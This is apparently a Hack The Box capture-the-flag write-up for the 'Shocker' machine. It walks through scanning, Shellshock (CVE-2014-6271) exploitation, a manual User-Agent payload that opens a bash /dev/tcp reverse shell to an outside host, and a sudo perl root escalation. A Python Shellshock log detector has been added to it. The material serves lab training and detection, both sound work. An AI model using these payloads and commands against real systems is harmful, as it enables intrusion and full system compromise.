🕵 HTB-Writeup : SHOCKER

Recon

nmap

nmap -sC -sV -Pn -p- -T5 10.10.10.56

21/tcp   filtered ftp
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster

While scanning the website, we discover an interesting /cgi-bin/ directory.

gobuster -u http://10.10.10.56 -w ~/CTF/TOOLS/wordlist/gobuster-wordlist.txt -t 10 -f

=====================================================
/.htaccess/ (Status: 403)
/cgi-bin/ (Status: 403)
/icons/ (Status: 403)
/.htpasswd/ (Status: 403)
/.htpasswds/ (Status: 403)
=====================================================

Vulnerabilities

I search for vulnerabilities in msfconsole and on exploit-db using the apache and cgi keywords.

msf6 exploit(linux/ssh/quantum_vmpro_backdoor) > search apache cgi

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/multi/http/apache_mod_cgi_bash_env_exec  2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   1  auxiliary/scanner/http/apache_mod_cgi_bash_env   2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

We find an exploit for CVE-2014-6271 (Shellshock), which targets CGI scripts. CGI (Common Gateway Interface) lets the web server hand a request to a script on the host, passing request data such as headers to it through environment variables; scripts placed in this directory perform different actions. Let's dirbust the cgi-bin folder!

I first try to run a nikto scan.

nikto -h 10.10.10.56

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8862 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-07-28 21:42:46 (GMT0) (143 seconds)
---------------------------------------------------------------------------

The scan didn't find anything interesting, so I then ran a classic gobuster against /cgi-bin/ looking for the sh, pl, cgi and php extensions.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x sh,cgi,pl 

===============================================================
/user.sh              (Status: 200)

I found a user.sh script. Downloading it shows that it is a test script the admin never deleted.

Content-Type: text/plain
Just an uptime test script
 05:58:51 up 10:42,  0 users,  load average: 0.00, 0.00, 0.00

Searching the Metasploit console, I found CVE-2014-6271, which is related to CGI scripts.

msf6 > search apache cgi

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   3  exploit/multi/http/apache_mod_cgi_bash_env_exec      2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   4  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

Let's check whether the host is vulnerable.

msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set rhosts 10.10.10.56
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set targeturi /cgi-bin/user.sh
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit

[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The host is vulnerable to Shellshock! The CGI script runs as the user shelly.

Exploit (Metasploit)

We then get a shell with the Shellshock exploit module.

msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

meterpreter > getuid
Server username: shelly

meterpreter > sysinfo
Computer     : 10.10.10.56
OS           : Ubuntu 16.04 (Linux 4.4.0-96-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

We land on an Ubuntu server as the user shelly. We can grab the user flag, then see which commands the user is allowed to run.

# get clean shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

# get user flag
shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt 
*************************95b233

Exploit (w/o Metasploit)

As Metasploit will only be available once during the OSCP exam, I try to do the exploits without Metasploit.

I found this OWASP presentation, which explains how to manually exploit the vulnerability, and by checking how the nmap NSE shellshock script works I knew I could use the User-Agent header as the input.

Command injection on the User-Agent header

I managed to run a command; now let's get a reverse shell. I took the reverse shell one-liner from the PayloadsAllTheThings cheatsheet.

My machine:

$ nc -lvnp 8082
listening on [any] 8082 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.56] 55502
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id 
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Request sent to the server:

GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
Upgrade-Insecure-Requests: 1
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.5/8082 0>&1

And there is my reverse shell.
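From the defender's side, the injection above leaves a clear trace: mod_cgi copies the User-Agent header into the HTTP_USER_AGENT environment variable, so a request header beginning with the bash function-definition prefix `() {` is the signature to look for. The following detector, an added example that is not part of the original writeup, parses Apache combined-format log lines (the User-Agent is the last quoted field) and flags any request whose User-Agent or Referer carries that prefix. The log lines are constructed for the example; the attacker IP, target and port are the ones used in this writeup.

```python
import re

# Unpatched bash treats an environment variable whose value starts with "() {"
# as an exported function definition and executes whatever follows the closing
# brace.  Detection keys on that prefix, allowing the whitespace variants seen
# in the wild ("() {", "(){", "( ) {").
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format; quotes inside a field are logged as \" so the
# User-Agent group accepts escaped characters.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log: one normal request to the CGI script, the Shellshock
# request from this writeup, a benign bot (parentheses but no "() {"), and a
# spacing variant of the prefix with a harmless trailing command.
SAMPLE_LOG = [
    '10.10.16.5 - - [28/Jul/2022:21:40:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.16.5 - - [28/Jul/2022:21:45:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.5/8082 0>&1"',
    '10.10.16.5 - - [28/Jul/2022:21:46:03 +0000] "GET /index.html HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
    '10.10.16.5 - - [28/Jul/2022:21:47:30 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "( ) { :; }; echo probe"',
]


def is_shellshock_header(value):
    """True if a header value starts with (or embeds) a bash function prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(lines):
    """Return (client_ip, request_line, offending_header) for each suspicious line."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash the sweep
        for field in ("ua", "referer"):
            if is_shellshock_header(rec[field]):
                hits.append((rec["ip"], rec["req"], rec[field]))
                break
    return hits


if __name__ == "__main__":
    for ip, req, hdr in find_shellshock(SAMPLE_LOG):
        print(f"SHELLSHOCK attempt from {ip}: {req} | header: {hdr}")
```

Only requests hitting CGI paths matter for exploitation, but the prefix is worth alerting on anywhere, since a patched bash ignores it and legitimate clients never send it.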

Privesc

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

shelly can run /usr/bin/perl as root without providing a password.

So we can simply spawn a shell from perl under sudo.

shelly@Shocker$ sudo perl -e 'exec "/bin/sh";'

# whoami
root

cat /root/root.txt
*************************c1ca467

We now own the system!

Tags

Easy, External, Apache, Penetration Tester Level 1, Remote Code Execution, CVE-2014-6271, A06:2021-Vulnerable And Outdated Components, Enumeration, CGI, Sudo Exploitation, Web Site Structure Discovery, CVE Exploitation, Security Tools, Public Vulnerabilities